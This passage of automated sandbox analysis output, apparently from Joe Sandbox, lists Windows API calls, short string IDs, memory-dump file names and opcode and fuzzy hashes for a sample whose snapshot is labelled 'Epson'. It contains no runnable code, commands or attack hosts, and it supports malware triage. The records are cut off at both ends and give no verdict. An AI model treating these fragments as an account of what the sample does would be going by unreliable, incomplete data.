                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FAEC60
                                                                                                                                                                                                                                      • ReleaseDC.USER32(?), ref: 00FAEC81
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2889604237-0
                                                                                                                                                                                                                                      • Opcode ID: 60a8b9212aaefbe1ece62d2f7479cd48ef8ee934e56cefb6825665ba1bd055a1
                                                                                                                                                                                                                                      • Instruction ID: 3843275c27ae19c4512138c77f98283b93e8d411d9a80f0d16d9e28978402cce
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60a8b9212aaefbe1ece62d2f7479cd48ef8ee934e56cefb6825665ba1bd055a1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01E012B5C00208EFCF409FA0C888A5DBBB1BB48311B108409E91AEB650CB386A01AF00
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F541EA: _wcslen.LIBCMT ref: 00F541EF
                                                                                                                                                                                                                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00FC5919
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Connection_wcslen
                                                                                                                                                                                                                                      • String ID: *$LPT
                                                                                                                                                                                                                                      • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                      • Opcode ID: e0f53bf4cb45c16bc4e44775ac58b761926b8122ca32bdc9468fc6f2bc23a26a
                                                                                                                                                                                                                                      • Instruction ID: d6fd6e68104f1749398862a92caebada93301e5e9970347dc79d851a8037d5ea
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e0f53bf4cb45c16bc4e44775ac58b761926b8122ca32bdc9468fc6f2bc23a26a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A91AB75A00605DFCB14CF44C986FAABBB1AF44714F18809DE84A9F3A2C775EE85DB90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 00F7E67D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorHandling__start
                                                                                                                                                                                                                                      • String ID: pow
                                                                                                                                                                                                                                      • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                      • Opcode ID: 64c5208309e21fdeee2d4207fb125786a4d03ae4ab79d13c25477c0bb75d6b8d
                                                                                                                                                                                                                                      • Instruction ID: ffcc511c82ecbf56743f7285def78b01a61778c5414e02cadb015e6b9edb7e50
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 64c5208309e21fdeee2d4207fb125786a4d03ae4ab79d13c25477c0bb75d6b8d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE517961E1850686CB157714CD053FA3BA4AB14BA0F708D9BF099422E8EF398C97BB47
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: #
                                                                                                                                                                                                                                      • API String ID: 0-1885708031
                                                                                                                                                                                                                                      • Opcode ID: 742a7e81908bd1de0dba1b034e0bac71bdbb4f66bd2dc7d7e08fbcbe7f04c4eb
                                                                                                                                                                                                                                      • Instruction ID: 4a0bca9e3fb40bc93b60391a512d407f0a7d92931ade5f73003cbc9f3dec1efa
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 742a7e81908bd1de0dba1b034e0bac71bdbb4f66bd2dc7d7e08fbcbe7f04c4eb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A5134B5904247DFCB25DF28C441ABA7BB0EF1A360F644055FC91AB290DB789D43EB61
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 00F6F6DB
                                                                                                                                                                                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00F6F6F4
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                      • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                      • Opcode ID: dd7c7637fa778f47f2c6a3d1aeb05b58eb5c3f8f97f4b59deaf3c5e31f951595
                                                                                                                                                                                                                                      • Instruction ID: 1fb82f391b4de14f26410624b02cf0982c8338cb928312b1b56583536d50ebf3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd7c7637fa778f47f2c6a3d1aeb05b58eb5c3f8f97f4b59deaf3c5e31f951595
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B517771918748EBD320AF10DC86BAFBBE8FF84341F81884DF6D951095DB398529CB26
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                      • String ID: CALLARGARRAY
                                                                                                                                                                                                                                      • API String ID: 157775604-1150593374
                                                                                                                                                                                                                                      • Opcode ID: 2deb3337c77e0029f96c74a0aa562fc6e372f65a0486b8d2dec4fc864da886b2
                                                                                                                                                                                                                                      • Instruction ID: 78b2696c7ed6dea8818d27959b5df1b81107b6184a14e1f9a923f67f19967a21
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2deb3337c77e0029f96c74a0aa562fc6e372f65a0486b8d2dec4fc864da886b2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4041AC31E002099FCF00DFA9C8819EEBBB6FF59361B14402AE505E7351D7749981EFA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FCDB75
                                                                                                                                                                                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00FCDB7F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                      • String ID: |
                                                                                                                                                                                                                                      • API String ID: 596671847-2343686810
                                                                                                                                                                                                                                      • Opcode ID: cae77e5fcda03ca2de4c94b3cc7f2c9b6f31114c6b88b7e4ae41a420622dc958
                                                                                                                                                                                                                                      • Instruction ID: 807b9c9f17dffb43ba018ba3d374e364faf29e3b7f27bc1da9d2848e416852ee
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cae77e5fcda03ca2de4c94b3cc7f2c9b6f31114c6b88b7e4ae41a420622dc958
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3313A72801109ABCF05DFA0CD85EEEBFB9FF04354F100029F915A6262EB759906EB50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00FE40BD
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00FE40F8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$DestroyMove
                                                                                                                                                                                                                                      • String ID: static
                                                                                                                                                                                                                                      • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                      • Opcode ID: 4e36180efdb55351acf006dbd5be548b92212713e21e4b406217080f30da9dd7
                                                                                                                                                                                                                                      • Instruction ID: 43a976565e0982ef8bb0e06b3d9cee118d353d4b975cffe8864ed47901a9a4ff
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e36180efdb55351acf006dbd5be548b92212713e21e4b406217080f30da9dd7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7319071510644AEDB24DF79CC80BFB73A9FF48760F10862DFA9587190DA75AC81EB60
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00FE50BD
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00FE50D2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                      • String ID: '
                                                                                                                                                                                                                                      • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                      • Opcode ID: c7a21f67512c72e2b69255c062fd394e3d7e2aadb4332a976f69998f067e107a
                                                                                                                                                                                                                                      • Instruction ID: 4cd6f5c5e11b04207c42aae6073a4f693d9ee73eb3adffcc871b6c15e9742b65
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7a21f67512c72e2b69255c062fd394e3d7e2aadb4332a976f69998f067e107a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95316A75A0074A9FDB14CFAAC880BDEBBB5FF49704F10406AEA04AB381D771A945DF90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00FE3D18
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FE3D23
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                      • String ID: Combobox
                                                                                                                                                                                                                                      • API String ID: 3850602802-2096851135
                                                                                                                                                                                                                                      • Opcode ID: 108e12524fa52b3b0a8b992ac88e3d2d47137e7bd8b84591a0a7da23368f2bb8
                                                                                                                                                                                                                                      • Instruction ID: 1a7ed293eab68c5c9b688f3a61cadc197ebacd8917c2b28e9f524ffd33865830
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 108e12524fa52b3b0a8b992ac88e3d2d47137e7bd8b84591a0a7da23368f2bb8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4011E271B0024C6FEF219F55DC88FAB3BAAEB843A4F204124F9199B290D675DD51A7A0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F57873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F578B1
                                                                                                                                                                                                                                        • Part of subcall function 00F57873: GetStockObject.GDI32(00000011), ref: 00F578C5
                                                                                                                                                                                                                                        • Part of subcall function 00F57873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F578CF
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00FE4216
                                                                                                                                                                                                                                      • GetSysColor.USER32(00000012), ref: 00FE4230
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                      • String ID: static
                                                                                                                                                                                                                                      • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                      • Opcode ID: 5fb78f295e4072437e2a3ecfb87623dd1bbf5c76f2e0bed5aa22b3db780a1d49
                                                                                                                                                                                                                                      • Instruction ID: aabbceafb9bb0c2fd64641d025af2dd9bea3e92095e24e532eb4c7967ab6a9fe
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5fb78f295e4072437e2a3ecfb87623dd1bbf5c76f2e0bed5aa22b3db780a1d49
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA116472A10249AFDB00DFA9CC45AFA7BF8EB08354F014928FE55E3250E735E850EB60
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00FCD7C2
                                                                                                                                                                                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00FCD7EB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Internet$OpenOption
                                                                                                                                                                                                                                      • String ID: <local>
                                                                                                                                                                                                                                      • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                      • Opcode ID: 66688bbf1a07b5b0f98928b63676c84b3d65a06a29b4c2187e5539a9aea65d03
                                                                                                                                                                                                                                      • Instruction ID: 3e51ce99ea2b9ae3c0514de0ea68dc40f3ccb60c35a32548c1e8f95011b3bb93
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66688bbf1a07b5b0f98928b63676c84b3d65a06a29b4c2187e5539a9aea65d03
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF11E37250123379D7344B628D8AFEBBE9CEF127B8F00422EB50992080D2748840E2F0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F5B329: _wcslen.LIBCMT ref: 00F5B333
                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?,?), ref: 00FB761D
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FB7629
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                      • String ID: STOP
                                                                                                                                                                                                                                      • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                      • Opcode ID: a11ecd2d4fc13885fb705d78b0e560e2895d669d893a789a5f3f6dfa21ac2cfc
                                                                                                                                                                                                                                      • Instruction ID: 9149da1c0c93a8e2996e62c8e53af0da35aaa2f53b50fe4d11a621131d98654b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a11ecd2d4fc13885fb705d78b0e560e2895d669d893a789a5f3f6dfa21ac2cfc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE01C832A04B2B8BCB10BEBECC509FF73B6AB907607400524E825D6191FB35D904AA50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F5B329: _wcslen.LIBCMT ref: 00F5B333
                                                                                                                                                                                                                                        • Part of subcall function 00FB45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00FB4620
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00FB2699
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                      • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                      • Opcode ID: 53db9036be8274a0c4e42b10a4f3f9d35e6c918eb3227f15f721101ff3061205
                                                                                                                                                                                                                                      • Instruction ID: a944ad1f0bd6df40c3199828ad8124b0ec3f171173c1610bdfa42059a0bac754
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 53db9036be8274a0c4e42b10a4f3f9d35e6c918eb3227f15f721101ff3061205
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E01D475A01215ABCB04EBA5CC51DFE7779FF46360B44061AB8726B2C1EA79580CEA50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F5B329: _wcslen.LIBCMT ref: 00F5B333
                                                                                                                                                                                                                                        • Part of subcall function 00FB45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00FB4620
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00FB2593
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
